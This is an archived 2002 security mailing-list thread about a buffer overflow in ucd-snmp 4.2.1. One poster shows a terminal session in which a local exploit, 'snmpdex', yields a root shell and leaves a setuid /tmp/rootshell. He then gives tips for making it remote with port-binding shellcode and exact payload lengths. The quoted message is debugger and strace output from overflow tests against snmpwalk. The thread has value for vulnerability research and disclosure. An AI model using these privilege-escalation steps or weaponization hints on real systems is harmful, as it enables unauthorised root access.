Well i did got positive results on a slackware 8.0 box running ucd-snmpd 4.2.1 ----- itchie@napalm:~$ /usr/local/sbin/snmpd --version UCD-snmp version: 4.2.1 Author: Wes Hardaker Email: ucd-snmp-coders@ucd-snmp.ucdavis.edu itchie@napalm:~$ ps -ax|grep snmpd 3686 pts/0 S 0:00 /usr/local/sbin/snmpd itchie@napalm:~$ ls -l /tmp/p00p /bin/ls: /tmp/p00p: No such file or directory itchie@napalm:~$ ls -l /tmp/rootshell* /bin/ls: /tmp/rootshell*: No such file or directory itchie@napalm:~$ ./snmpdex Promisc Digital Research Group presents a local exploit for ucd-snmp-4.2.1 Coded by The Itch http://www.promisc.org ps: leaves a rootshell in /tmp/rootshell Timeout: No Response from 127.0.0.1 bash-2.05# id uid=0(root) gid=0(root) groups=100(users) bash-2.05# ls -l /tmp/rootshell -rwsr-xr-x 1 root root 13456 Feb 21 22:33 /tmp/rootshell bash-2.05# ps -ax|grep snmp bash-2.05# ------------- You could make it remote too, by adjusting the shellcode to something portbinding, however the problems that i encountered: the lengt to crash snmpd must be exactly 256 bytes, one more or one less will give no result. The string however gets cut in half by snmpd so the only really usefull part is the first half which is about 144 bytes long. have fun, ----- On Wed, 20 Feb 2002, KF wrote: I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like local exploits to me. [root@linuxppc root]# ps -ef | grep snmp root 6355 1 17 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null (gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'` Program received signal SIGSEGV, Segmentation fault. 0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so (gdb) bt #0 0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so #1 0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so #2 0x10000e28 in _init () #3 0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6 (gdb) r 127.0.0.1 public `perl -e 'print "A" x 308'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 308'` Program received signal SIGILL, Illegal instruction. 0x41414100 in ?? () (gdb) r 127.0.0.1 public `perl -e 'print "A" x 309'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'` Program received signal SIGILL, Illegal instruction. 0x41414140 in ?? () This is snmpwalk NOT snmpd dying... [root@linuxppc root]# ps -ef | grep snmp root 6355 1 5 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null Still running... Ok lets use a newer version of snmpwalk [root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA: Unknown Object Identifier (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) [root@linuxppc root]# ps -ef | grep snmp root 6355 1 4 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null still running... These are the examples I have seen in various emails as methods to exploit snmpd...These seem to do nothing on my box to the client or the daemon... snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'` execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL); execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL); Here are my results. [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print "A" x 256'` Timeout: No Response from 127.0.0.1 [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 450'` Timeout: No Response from 127.0.0.1 [root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e 'print "A" x 4050'` Timeout: No Response from 127.0.0.1 Addtional findings. [root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl -e 'print "A" x 4050'` Segmentation fault [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c public `perl -e 'print "A" x 4050'` Segmentation fault Mean while the daemon reads the requests with no problems... [0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1 [0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494 [0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0 [0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1 [0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494 [0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0 [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 3999'` Timeout: No Response from 127.0.0.1 [0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037 [0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0 [0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1 [0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037 Give it too many chars and snmpwalk complains. [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'` snmpwalk: Error building ASN.1 representation Again YOUR results may vary ... these are mine. -KF
This archive was generated by hypermail 2b30 : Thu Feb 21 2002 - 15:43:31 PST